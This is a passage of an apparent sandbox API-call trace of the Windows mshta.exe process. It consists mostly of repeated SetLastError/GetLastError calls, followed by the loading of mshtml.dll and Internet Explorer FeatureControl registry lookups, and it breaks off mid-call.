0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.993] GetLastError () returned 0x0 [0039.993] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.994] SetLastError (dwErrCode=0x0) [0039.994] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.995] SetLastError (dwErrCode=0x0) [0039.995] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.996] GetLastError () returned 0x0 [0039.996] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.997] GetLastError () returned 0x0 [0039.997] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] GetLastError () returned 0x0 [0039.998] SetLastError (dwErrCode=0x0) [0039.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x400) returned 0x4fc4e0 [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0039.999] SetLastError (dwErrCode=0x0) [0039.999] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.000] SetLastError (dwErrCode=0x0) [0040.000] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.001] GetLastError () returned 0x0 [0040.001] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.002] SetLastError (dwErrCode=0x0) [0040.002] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.003] SetLastError (dwErrCode=0x0) [0040.003] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.004] SetLastError (dwErrCode=0x0) [0040.004] GetLastError () returned 0x0 [0040.005] SetLastError (dwErrCode=0x0) [0040.005] GetLastError () returned 0x0 [0040.005] SetLastError (dwErrCode=0x0) [0040.005] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.016] GetLastError () returned 0x0 [0040.016] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.017] SetLastError (dwErrCode=0x0) [0040.017] GetLastError () returned 0x0 [0040.018] SetLastError (dwErrCode=0x0) [0040.018] GetLastError () returned 0x0 [0040.018] SetLastError (dwErrCode=0x0) [0040.018] GetLastError () returned 0x0 [0040.018] SetLastError (dwErrCode=0x0) [0040.018] GetLastError () returned 0x0 [0040.018] SetLastError (dwErrCode=0x0) [0040.018] GetLastError () returned 0x0 [0040.018] SetLastError (dwErrCode=0x0) [0040.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x687) returned 0x4fc8f0 [0040.028] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x655590 | out: hHeap=0x650000) returned 1 [0040.028] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff7a2cc4) returned 0x0 [0040.029] GetLastError () returned 0x0 [0040.029] SetLastError (dwErrCode=0x0) [0040.029] GetLastError () returned 0x0 [0040.029] SetLastError (dwErrCode=0x0) [0040.029] GetVersion () returned 0x1db10106 [0040.029] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x776e0000 [0040.029] GetProcAddress (hModule=0x776e0000, lpProcName="HeapSetInformation") returned 0x776fb8d0 [0040.029] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x105) returned 0x655d30 [0040.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x105) returned 0x655e40 [0040.029] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x30f6c8 | out: phkResult=0x30f6c8*=0x2a) returned 0x0 [0040.030] RegQueryValueExA (in: hKey=0x2a, lpValueName=0x0, lpReserved=0x0, lpType=0x30f6c0, lpData=0x655d30, lpcbData=0x30f6c4*=0x105 | out: lpType=0x30f6c0*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x30f6c4*=0x1f) returned 0x0 [0040.030] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x7feef840000 [0046.518] GetProcessHeap () returned 0x3f0000 [0046.518] HeapSetInformation (HeapHandle=0x3f0000, HeapInformationClass=0x0, HeapInformation=0x30f128, HeapInformationLength=0x4) returned 1 [0046.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f0f0 | out: lpSystemTimeAsFileTime=0x30f0f0*(dwLowDateTime=0x708f0980, dwHighDateTime=0x1d809f7)) [0046.518] GetCurrentProcessId () returned 0xf10 [0046.518] GetCurrentThreadId () returned 0xf14 [0046.518] QueryPerformanceCounter (in: lpPerformanceCount=0x30f0f8 | out: lpPerformanceCount=0x30f0f8*=2963014451538) returned 1 [0046.518] malloc (_Size=0x100) returned 0x686170 [0046.519] GetVersionExA (in: lpVersionInformation=0x30ee50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30ee50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.519] __dllonexit () returned 0x7feef90a28c [0046.519] __dllonexit () returned 0x7feef90e5b4 [0046.519] GetProcessHeap () returned 0x3f0000 [0046.519] __dllonexit () returned 0x7feef904de0 [0046.519] __dllonexit () returned 0x7feef904e0c [0046.519] __dllonexit () returned 0x7feef9078c0 [0046.519] __dllonexit () returned 0x7feef909f60 [0046.519] __dllonexit () returned 0x7feef904dac [0046.520] __dllonexit () returned 0x7feef90a204 [0046.520] __dllonexit () returned 0x7feef904dc0 [0046.520] __dllonexit () returned 0x7feef9045c0 [0046.520] __dllonexit () returned 0x7feef9045d0 [0046.520] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc131 [0046.520] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc131 [0046.520] __dllonexit () returned 0x7feef904600 [0046.520] __dllonexit () returned 0x7feef904630 [0046.520] __dllonexit () returned 0x7feef904670 [0046.520] __dllonexit () returned 0x7feef904690 [0046.521] __dllonexit () returned 0x7feef9046c0 [0046.521] __dllonexit () returned 0x7feef909fd0 [0046.521] __dllonexit () returned 0x7feef9046e0 [0046.521] __dllonexit () returned 0x7feef904700 [0046.521] __dllonexit () returned 0x7feef904720 [0046.521] __dllonexit () returned 0x7feef904740 [0046.521] __dllonexit () returned 0x7feef904760 [0046.521] __dllonexit () returned 0x7feef90a000 [0046.521] __dllonexit () returned 0x7feef904780 [0046.521] __dllonexit () returned 0x7feef9047a0 [0046.521] __dllonexit () returned 0x7feef9047d0 [0046.522] __dllonexit () returned 0x7feef9047f0 [0046.522] __dllonexit () returned 0x7feef904810 [0046.522] __dllonexit () returned 0x7feef904830 [0046.522] __dllonexit () returned 0x7feef904850 [0046.522] __dllonexit () returned 0x7feef904870 [0046.522] __dllonexit () returned 0x7feef904890 [0046.522] __dllonexit () returned 0x7feef9048b0 [0046.522] __dllonexit () returned 0x7feef9048d0 [0046.522] __dllonexit () returned 0x7feef9048f0 [0046.522] __dllonexit () returned 0x7feef904910 [0046.522] __dllonexit () returned 0x7feef904930 [0046.522] __dllonexit () returned 0x7feef904950 [0046.523] __dllonexit () returned 0x7feef904970 [0046.523] __dllonexit () returned 0x7feef904990 [0046.523] __dllonexit () returned 0x7feef9049b0 [0046.523] __dllonexit () returned 0x7feef9049d0 [0046.523] __dllonexit () returned 0x7feef9049f0 [0046.523] __dllonexit () returned 0x7feef904a10 [0046.523] __dllonexit () returned 0x7feef904a40 [0046.523] __dllonexit () returned 0x7feef904a70 [0046.523] __dllonexit () returned 0x7feef904aa0 [0046.524] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0046.524] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0046.524] __dllonexit () returned 0x7feef904ab0 [0046.524] __dllonexit () returned 0x7feef90a0d0 [0046.524] __dllonexit () returned 0x7feef904ae0 [0046.524] __dllonexit () returned 0x7feef904af0 [0046.524] __dllonexit () returned 0x7feef904b10 [0046.524] __dllonexit () returned 0x7feef904b30 [0046.524] __dllonexit () returned 0x7feef90a100 [0046.525] __dllonexit () returned 0x7feef904b50 [0046.525] __dllonexit () returned 0x7feef904b70 [0046.525] __dllonexit () returned 0x7feef904b90 [0046.525] __dllonexit () returned 0x7feef904bb0 [0046.525] __dllonexit () returned 0x7feef904bd0 [0046.525] __dllonexit () returned 0x7feef904bf0 [0046.525] __dllonexit () returned 0x7feef904c10 [0046.525] __dllonexit () returned 0x7feef904c30 [0046.525] __dllonexit () returned 0x7feef904c50 [0046.526] __dllonexit () returned 0x7feef904c70 [0046.526] __dllonexit () returned 0x7feef904c90 [0046.526] __dllonexit () returned 0x7feef904cb0 [0046.526] __dllonexit () returned 0x7feef904cd0 [0046.526] __dllonexit () returned 0x7feef90e500 [0046.526] __dllonexit () returned 0x7feef904cf0 [0046.526] __dllonexit () returned 0x7feef90a150 [0046.526] __dllonexit () returned 0x7feef90a190 [0046.527] __dllonexit () returned 0x7feef904d1c [0046.527] __dllonexit () returned 0x7feef904d3c [0046.527] __dllonexit () returned 0x7feef904d50 [0046.527] GetCurrentThreadId () returned 0xf14 [0046.527] CoCreateGuid (in: pguid=0x7fef00049d0 | out: pguid=0x7fef00049d0*(Data1=0x7a13b1f6, Data2=0xba99, Data3=0x43b1, Data4=([0]=0x95, [1]=0x39, [2]=0x56, [3]=0xea, [4]=0x7f, [5]=0x57, [6]=0x35, [7]=0x99))) returned 0x0 [0046.531] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x41a4f0 [0046.532] __dllonexit () returned 0x7feef90a1b8 [0046.532] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30e800, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0046.532] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe" [0046.532] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0046.532] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0046.532] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x41a900 [0046.532] SHRegGetValueW () returned 0x2 [0046.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea88 | out: phkResult=0x30ea88*=0x0) returned 0x2 [0046.532] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea90 | out: phkResult=0x30ea90*=0x0) returned 0x2 [0046.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.532] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.543] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.543] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.544] RegCloseKey (hKey=0x0) returned 0x6 [0046.544] RegCloseKey (hKey=0x0) returned 0x6 [0046.544] RegCloseKey (hKey=0x78) returned 0x0 [0046.544] RegCloseKey (hKey=0x7c) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.544] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.544] RegCloseKey (hKey=0x0) returned 0x6 [0046.544] RegCloseKey (hKey=0x0) returned 0x6 [0046.544] RegCloseKey (hKey=0x7c) returned 0x0 [0046.544] RegCloseKey (hKey=0x78) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", 